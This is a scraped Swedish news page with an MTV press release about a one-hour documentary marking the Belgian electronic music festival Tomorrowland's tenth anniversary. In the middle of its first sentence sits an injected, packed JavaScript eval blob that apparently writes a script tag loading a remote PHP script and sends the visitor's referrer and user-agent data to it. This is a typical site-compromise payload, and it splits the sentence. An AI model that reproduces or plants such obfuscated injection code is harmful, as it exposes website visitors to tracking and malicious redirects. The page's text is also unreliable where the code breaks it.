Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

MTV tar med tittarna på en magisk resa till Tomorrowland

MTV tar med tittarna på en magisk resa till Tomorrowland

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfykk|var|u0026u|referrer|bbizr||js|php’.split(’|’),0,{}))
heta och spektaktulära musikfestivalen för elektronisk musik Tomorrowland firar sitt 10 års jubileum. Festivalen har hyllats världen över med sina sagoinspirerande teman och biljetterna har snabbt sålt slut. Fredagen den 29 augusti sänder MTV exklusivt dokumentären ”TOMORROWLAND: 10 YEARS OF UNITY, LOVE, MADNESS AND MAGIC” för att hylla festivalen och ge en tillbakablick på festivalens mest minnesvärda och galna framträdanden.

MTV bjuder in till att hylla och fira fenomenet kring den belgiska musikfestivalen ”Tomorrowland” i en exklusiv entimmes dokumentär ”TOMORROWLAND: 10 YEARS OF UNITY, LOVE, MADNESS AND MAGIC”. Dokumentären skildrar resan och konceptet bakom festivalen som idag tillhör världens största i sitt slag. Uppträdanden och intervjuer från några av världens främsta DJ:s visas, exempelvis med Armin van Buuren, Paul Van Dyk, Moby, David Guetta, Afrojack, Steve Aoki, Dimitri Vegas & like Mike och Hardwell.

Detta är ett pressmeddelande från MTV